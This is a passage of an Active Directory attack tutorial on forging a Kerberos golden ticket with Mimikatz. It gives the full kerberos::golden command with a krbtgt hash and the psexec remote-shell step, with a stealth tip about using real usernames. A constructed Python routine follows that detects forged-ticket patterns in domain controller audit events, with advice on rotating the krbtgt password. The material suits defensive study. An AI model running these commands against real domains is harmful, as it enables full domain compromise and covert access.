To create a golden ticket, first dump the krbtgt NTLM hash from a compromised DC with Mimikatz as described below:
Using the same method as for creating a silver ticket, switch to a compromised workstation and create the golden ticket in memory with kerberos::golden. This does not require administrator rights.
kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599479668 /krbtgt:75b60230a2394a812000dbfad8415965 /ptt
The username does not matter, since the DC trusts the TGT blindly if PAC validation is not enabled. Of course, using a real username is always better, as it reduces suspicion and adds stealth.
Use misc::cmd to launch a shell with the current ticket, and use psexec.exe \\dc01 cmd.exe to launch a remote shell. Note that using the hostname is mandatory to perform overpass-the-hash here; using an IP address instead will fall back to NTLM authentication.
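The two properties described above (the DC accepts a TGT for an account name it never issued a ticket to, and the forged TGT never passes through an AS-REQ on the DC) are also what a defender can key on in the DC's Kerberos audit log. The following added example is not part of the original page; it is a constructed detection routine that assumes a simplified event shape (4768 = TGT issued, 4769 = service ticket requested, with user, client and timestamp fields) and a constructed list of directory accounts. It flags service ticket requests for accounts that do not exist, requests with no preceding TGT issuance from the same client, and requests whose last TGT is older than the domain's maximum TGT lifetime.

```python
"""Flag golden-ticket-style service ticket requests in DC audit events.

Added example, not from the original page. Event format is an assumption:
one dict per event with 'id' (4768 = TGT issued, 4769 = service ticket
requested), 'ts' (epoch seconds), 'user', 'client' and, for 4769, 'service'.
All sample data below is constructed.
"""

# Constructed sample events (not real logs):
#  - alice obtains a TGT from 10.0.0.5 and then requests a service ticket,
#    but also requests one from 10.0.0.42 where no TGT was ever issued;
#  - fakeuser (does not exist in the directory) requests service tickets;
#  - bob's service ticket request arrives 11h after his last TGT.
SAMPLE_EVENTS = [
    {"id": 4768, "ts": 1000, "user": "alice", "client": "10.0.0.5"},
    {"id": 4769, "ts": 1010, "user": "alice", "client": "10.0.0.5", "service": "cifs/dc01"},
    {"id": 4769, "ts": 1500, "user": "alice", "client": "10.0.0.42", "service": "ldap/dc01"},
    {"id": 4769, "ts": 2000, "user": "fakeuser", "client": "10.0.0.77", "service": "cifs/dc01"},
    {"id": 4769, "ts": 2005, "user": "fakeuser", "client": "10.0.0.77", "service": "host/dc01"},
    {"id": 4768, "ts": 3000, "user": "bob", "client": "10.0.0.9"},
    {"id": 4769, "ts": 3000 + 11 * 3600, "user": "bob", "client": "10.0.0.9", "service": "cifs/fs01"},
]

# Constructed set of accounts that exist in the directory (assumption; in
# practice this comes from an AD export). Compared case-insensitively.
KNOWN_ACCOUNTS = {"alice", "bob", "krbtgt", "administrator"}

# Default domain TGT lifetime is 10 hours.
MAX_TGT_LIFETIME = 10 * 3600


def find_suspicious_tgs(events, known_accounts, max_tgt_lifetime=MAX_TGT_LIFETIME):
    """Return a list of (event, reason) for 4769 events that look forged.

    Reasons:
      'unknown-account': the account name does not exist in the directory
      'no-tgt':          no 4768 was ever logged for this user/client pair
      'tgt-expired':     the last 4768 for the pair is older than the TGT lifetime
    Events are processed in timestamp order so a later TGT cannot excuse an
    earlier service ticket request.
    """
    known = {name.lower() for name in known_accounts}
    last_tgt = {}  # (user, client) -> ts of most recent TGT issued by this DC
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["user"].lower(), ev["client"])
        if ev["id"] == 4768:
            last_tgt[key] = ev["ts"]
            continue
        if ev["id"] != 4769:
            continue
        if key[0] not in known:
            findings.append((ev, "unknown-account"))
            continue
        issued = last_tgt.get(key)
        if issued is None:
            findings.append((ev, "no-tgt"))
        elif ev["ts"] - issued > max_tgt_lifetime:
            findings.append((ev, "tgt-expired"))
    return findings


def summarize(findings):
    """Collapse findings into {(user, client): [reasons]} for reporting."""
    summary = {}
    for ev, reason in findings:
        summary.setdefault((ev["user"], ev["client"]), []).append(reason)
    return summary


if __name__ == "__main__":
    for (user, client), reasons in summarize(
        find_suspicious_tgs(SAMPLE_EVENTS, KNOWN_ACCOUNTS)
    ).items():
        print(f"{user}@{client}: {', '.join(reasons)}")
```

The 'no-tgt' rule assumes the collector sees every DC's 4768 events; in a multi-DC domain a client may legitimately obtain its TGT from one DC and request service tickets from another, so correlate across all DCs before alerting. Ticket renewals are logged as 4769 requests against the krbtgt service rather than as new 4768 events, so a long-lived but legitimately renewed session will trip 'tgt-expired' unless renewals are folded into last_tgt. Rotating the krbtgt password twice, as Microsoft documents, invalidates tickets forged with the dumped hash.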